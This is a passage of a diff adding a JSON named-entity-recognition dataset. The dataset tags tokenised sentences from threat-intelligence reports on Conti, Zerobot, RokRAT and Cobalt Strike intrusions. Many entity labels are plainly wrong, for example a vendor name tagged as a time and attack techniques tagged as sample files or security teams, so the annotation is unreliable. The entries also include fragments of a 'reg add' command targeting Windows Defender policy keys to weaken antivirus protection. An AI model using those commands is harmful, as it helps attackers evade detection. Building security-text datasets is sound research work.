"Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "evade", + "detection,", + "the", + "threat", + "actors", + "disabled", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "disabled", + "Windows", + "Defender", + "via", + "a", + "group", + "policy", + "modification." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "adding", + "the", + "below", + "to", + "an", + "already", + "linked", + "GPO." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "then", + "force", + "updated", + "the", + "GPO", + "on", + "all", + "clients", + "using", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "Beacon", + "was", + "dropped", + "and", + "executed", + "on", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "was", + "executed", + "via", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "including", + "the", + "computer", + "name", + "and", + "the", + "OS", + "version", + "of", + "the", + "compromised", + "system", + "were", + "sent" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C", + "reg", + "add" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "Defender\\DisableAntiSpyware", + "DeleteValue" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "Defender\\Real-Time", + "Monitoring\\DisableRealtimeMonitoring", + "DeleteValue" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "Defender\\Real-Time", + "Monitoring\\DisableBehaviorMonitoring", + "DeleteValue" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "Defender\\Real-Time", + "Monitoring\\DisableIntrusionPreventionSystem", + "DeleteValue" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "Defender\\Real-Time", + "Protection", + "DeleteKey" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "used", + "a", + "redirector", + "(38.135.122[.]194:8080)", + "to", + "proxy", + "the", + "RDP", + "traffic", + "being", + "passed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "proxied", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "was", + "accessed", + "by", + "an", + "unusual", + "process", + "“runonce.exe”", + "on", + "multiple", + "hosts,", + "including", + "a", + "domain", + "controller." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "systems", + "injected", + "the", + "Conti", + "DLL", + "into", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "web", + "application", + "vulnerabilities" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploiting", + "vulnerabilities", + "in", + "Apache", + "and", + "Apache", + "Spark", + "(CVE-2021-42013", + "and", + "CVE-2022-33891" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "GrandstreamCVE-2020-25223WebAdmin", + "of", + "Sophos", + "SG", + "UTMCVE-2021-42013ApacheCVE-2022-31137Roxy-WICVE-2022-33891Apache", + "SparkZSL-" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "CVE-2018-12613,", + "a", + "phpMyAdmin", + "vulnerability", + "that", + "could", + "allow", + "threat", + "actors", + "to", + "view", + "or", + "execute", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "propagating", + "through", + "brute", + "force", + "attacks", + "on", + "vulnerable", + "devices", + "with", + "insecure", + "configurations", + "that", + "use", + "default", + "or", + "weak", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "default", + "or", + "weak", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "combination", + "of", + "eight", + "common", + "usernames", + "and", + "130", + "passwords" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "downloads" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "Zerobot", + "binary" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "download", + "and", + "execute", + "binaries", + "of", + "various", + "architectures", + "until", + "it", + "succeeds" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "this", + "RAT," + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "identify", + "the", + "architecture" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "copies", + "itself", + "to", + "the", + "Startup", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "methodDescriptionUDP_LEGITSends", + "UDP", + "packets", + "without", + "data" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TCP_HANDSHAKEFloods", + "with", + "TCP", + "handshakes.TCP_SOCKETContinuously", + "sends", + "random", + "payloads", + "on", + "an", + "open", + "TCP", + "socket." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TLS_SOCKETContinuously", + "sends", + "random", + "payloads", + "on", + "an", + "open", + "TLS", + "socket." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "methodDescriptionUDP_RAWSends", + "UDP", + "packets", + "where", + "the", + "payload", + "is", + "customizable.ICMP_FLOODSupposed", + "to", + "be", + "an", + "ICMP", + "flood,", + "but", + "the", + "packet", + "is", + "built", + "incorrectly.TCP_CUSTOMSends", + "TCP", + "packets", + "where", + "the", + "payload", + "and", + "flags", + "are", + "fully", + "customizable.TCP_SYNSends", + "SYN", + "packets.TCP_ACKSends", + "ACK", + "packets.TCP_SYNACKSends", + "SYN-ACK", + "packets.TCP_XMASChristmas", + "tree", + "attack", + "(all", + "TCP", + "flags", + "are", + "set)." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP_HANDLESends", + "HTTP", + "GET", + "requests", + "using", + "a", + "Golang", + "standard", + "library.HTTP_RAWFormats", + "and", + "sends", + "HTTP", + "GET", + "requests.HTTP_BYPASSSends", + "HTTP", + "GET", + "requests", + "with", + "spoofed", + "headers.HTTP_NULLHTTP", + "headers", + "are", + "each", + "one", + "random", + "byte", + "(" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zerobot", + "HTTP", + "requests" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "open-source", + "remote", + "administration", + "tool", + "(RAT)", + "with", + "various", + "features", + "such", + "as", + "managing", + "processes,", + "file", + "operations,", + "screenshotting,", + "and", + "running", + "commands." + ], + "ner_tags": [ + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "I-Features", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "running", + "commands" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "screenshotting," + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "This", + "attachment", + "(unless", + "zipped)", + "is", + "the", + "MyDoom", + "executable." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "executables", + "attached", + "to", + "its", + "phishing", + "e-mails", + "have", + "an", + "extension", + "hidden", + "by", + "default", + "by", + "most", + "Windows", + "deployments", + "(.cmd,", + ".scr,", + ".com,", + "etc.)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "file", + "is", + "a", + "32-bit", + "Windows", + "executable", + "packed", + "using", + "the", + "UPX", + "(Ultimate", + "Packer", + "for", + "Executables)", + "packer", + "(https://en.wikipedia.org/wiki/UPX)", + "to", + "compress", + "and", + "make", + "it", + "more", + "difficult", + "to", + "analyze." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "packer", + "decompresses", + "and", + "executes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upon", + "execution,", + "an", + "attempt", + "to", + "alter", + "the", + "Windows", + "firewall", + "settings", + "is", + "made." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "makes", + "a", + "copy", + "of", + "itself,", + "places", + "it", + "in", + "the", + "“Temp”", + "folder", + "(C:\\Users\\<user>\\AppData\\Local\\Temp),", + "and", + "changes", + "the", + "name", + "to", + "a", + "known", + "Windows", + "application/process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "activity", + "thereafter", + "included", + "dumps", + "of", + "LSASS" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "process", + "enumerations." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "launched", + "by", + "cmd.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "executable", + "‘3ujwy2rz7v.exe’", + "was", + "downloaded" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "uses", + "command", + "and", + "control", + "servers", + "to", + "collect", + "information", + "on", + "compromised", + "systems" + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "user", + "had", + "to", + "click", + "on", + "this", + "in", + "order", + "to", + "execute", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "immediately", + "begins", + "to", + "look", + "for", + "EDR", + "and", + "antivirus", + "software." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Phishing", + "emails", + "spoof", + "legitimate", + "senders", + "to", + "deliver", + "RokRAT", + "via", + "LNK", + "files" + ], + "ner_tags": [ + "B-Tool", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Email", + "attachments", + "mimic", + "legitimate", + "documents" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "several", + "Zip", + "Archives", + "files", + "hosting", + "multiple", + "lure", + "documents", + "likely", + "sent", + "via", + "phishing", + "campaigns" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "targets", + "for", + "phishing", + "emails", + "containing", + "this", + "type", + "of", + "decoy", + "document." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "campaigns", + "typically", + "begin", + "with", + "a", + "phishing", + "email", + "with", + "a", + "ZIP", + "file", + "attachment,", + "containing", + "a", + "LNK", + "file", + "disguised", + "as", + "a", + "Word", + "document" + ], + "ner_tags": [ + "B-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "containing", + "obfuscated", + "PowerShell", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "obfuscation", + "technique", + "for", + "the", + "dropped", + "files", + "being", + "hex-encoding", + "vs.", + "string", + "concatenation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contain", + "an", + "encoded", + "PowerShell," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "scripts", + "in", + "charge", + "of", + "downloading", + "a", + "second", + "stage", + "RokRAT", + "shellcode" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "file", + "download/upload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "start", + "the", + "download", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Optical", + "Disc", + "Image", + "files", + "(ISO)", + "containing", + "LNK", + "files", + "that", + "had", + "slightly", + "modified", + "PowerShell", + "scripts,", + "and", + "Hangul", + "Word", + "Processor", + "decoy", + "documents" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "The", + "ISO", + "files", + "that", + "X-Force", + "observed", + "contained", + "a", + "LNK", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "a", + "JPEG", + "decoy", + "file", + "are", + "dropped" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "JPEG", + "decoy", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "drop", + "batch", + "files" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "then", + "the", + "payload", + "is", + "executed", + "using", + "Windows", + "API", + "functions", + "(VirtualProtect)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "payload", + "that", + "is", + "decoded", + "using", + "the", + "first", + "byte", + "as", + "a", + "key," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "packed", + "into", + "a", + "Windows", + "executable", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stealing", + "sensitive", + "data", + "from", + "the", + "victim’s", + "networks." + ], + "ner_tags": [ + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "identifies", + "data", + "of", + "interest", + "from", + "the", + "network", + "of", + "the", + "victim" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "can", + "be", + "anything", + "from", + "file", + "and", + "directory-listings,", + "configuration", + "files,", + "manuals,", + "email", + "stores", + "in", + "the", + "guise", + "of", + "OST-", + "and", + "PST-files,", + "file", + "shares", + "with", + "intellectual", + "property", + "(IP),", + "and", + "data", + "scraped", + "from", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "collected", + "the", + "data", + "from", + "various", + "sources", + "within", + "the", + "victim’s", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Credential", + "theft", + "and", + "password", + "spraying" + ], + "ner_tags": [ + "B-SamFile", + "B-Purp", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "password", + "spraying", + "attack", + "against", + "the", + "victim’s", + "remote", + "services," + ], + "ner_tags": [ + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "this", + "list", + "of", + "administrator-accounts,", + "the", + "adversary", + "performs", + "another", + "password", + "spraying", + "attack", + "until", + "a", + "valid", + "admin", + "account", + "is", + "compromised" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "adversary", + "started", + "a", + "password", + "spraying", + "attack", + "against", + "those", + "domain", + "admin", + "accounts," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "user", + "account", + "was", + "possibly", + "compromised", + "on", + "the", + "Linux", + "server", + "by", + "using", + "credential", + "stuffing", + "or", + "password", + "spraying:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Logfiles", + "on", + "the", + "Linux-system", + "show", + "traces", + "which", + "can", + "be", + "attributed", + "to", + "a", + "credential", + "stuffing", + "or", + "password", + "spraying", + "attack." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "I-OffAct", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Password", + "spraying" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "or", + "password", + "spraying." + ], + "ner_tags": [ + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "This", + "adversary", + "starts", + "with", + "obtaining", + "usernames" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "The", + "built-in", + "Windows", + "quser-command", + "to", + "show", + "logged", + "on", + "users", + "is", + "also", + "heavily", + "used", + "by", + "them." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "identify", + "if", + "privileged", + "users", + "are", + "active", + "on", + "remote", + "servers,", + "the", + "adversary", + "makes", + "use", + "of", + "PsLogList", + "from", + "Microsoft", + "Sysinternals" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "identify", + "if", + "privileged", + "users", + "are", + "active", + "on", + "the", + "systems" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "credentials", + "are", + "used", + "in", + "a", + "credential", + "stuffing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "user", + "account", + "was", + "possibly", + "compromised", + "on", + "the", + "Linux", + "server", + "by", + "using", + "credential", + "stuffing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Logfiles", + "on", + "the", + "Linux-system", + "show", + "traces", + "which", + "can", + "be", + "attributed", + "to", + "a", + "credential", + "stuffing", + "or", + "password", + "spraying", + "attack." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "I-OffAct", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "credential", + "stuffing" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "more", + "specifically", + "by", + "credential", + "stuffing" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "After", + "obtaining", + "a", + "valid", + "account,", + "they", + "use", + "this", + "account", + "to", + "access", + "the", + "victim’s", + "VPN,", + "Citrix", + "or", + "another", + "remote", + "service", + "that", + "allows", + "access", + "to", + "the", + "network", + "of", + "the", + "victim." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "this", + "valid", + "admin", + "account,", + "a", + "Cobalt", + "Strike", + "beacon", + "is", + "loaded", + "into", + "memory", + "of", + "patient", + "zero." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "used", + "the", + "valid", + "account", + "to", + "directly", + "login" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "used", + "valid", + "accounts", + "against", + "remote", + "services:" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "accessed", + "the", + "company", + "portal", + "with", + "the", + "valid", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cloud", + "drive,", + "or", + "other", + "cloud", + "resources", + "accessible", + "by", + "the", + "compromised", + "account." + ], + "ner_tags": [ + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "now", + "armed", + "with", + "the", + "valid", + "account,", + "was", + "able", + "to", + "access", + "a", + "document", + "stored", + "in", + "SharePoint", + "Online,", + "part", + "of", + "Microsoft", + "Office", + "365." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "starts", + "using", + "the", + "Cobalt", + "Strike", + "beacon", + "for", + "remote", + "access", + "and", + "command", + "and", + "control." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "the", + "obtained", + "valid", + "account", + "is", + "already", + "member", + "of", + "the", + "domain", + "admins", + "group,", + "the", + "first", + "lateral", + "move", + "in", + "the", + "network", + "is", + "usually", + "to", + "a", + "domain", + "controller" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "this", + "the", + "adversary", + "dumps", + "the", + "domain", + "admin", + "credentials", + "from", + "the", + "memory", + "of", + "this", + "machine,", + "continues", + "lateral", + "moving", + "through", + "the", + "network," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "finds", + "the", + "trust", + "relationships", + "and", + "jump", + "hosts,", + "attempting", + "to", + "move", + "into", + "the", + "other", + "domains", + "and", + "security", + "zones." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "successfully", + "got", + "a", + "valid", + "domain", + "admin", + "account", + "this", + "way." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "other", + "cases,", + "the", + "adversary", + "moved", + "laterally", + "to", + "another", + "system", + "with", + "a", + "domain", + "admin", + "logged", + "in." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "can", + "be", + "anything", + "from", + "file", + "and", + "directory-listings," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "copying", + "results", + "of", + "the", + "discovery", + "phase,", + "like", + "file-", + "and", + "directory", + "lists", + "from", + "local", + "systems," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "the", + "data", + "is", + "small", + "enough,", + "it", + "is", + "exfiltrated", + "through", + "the", + "command", + "and", + "control", + "channel", + "of", + "the", + "Cobalt", + "Strike", + "beacons." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "The", + 